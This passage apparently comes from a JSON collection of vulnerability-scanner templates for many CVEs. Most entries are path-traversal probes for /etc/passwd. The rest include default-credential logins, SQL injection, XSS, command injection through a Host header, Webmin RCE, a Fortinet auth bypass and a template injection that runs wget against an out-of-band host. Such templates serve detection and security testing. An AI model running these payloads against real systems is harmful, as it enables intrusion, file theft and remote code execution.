Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit 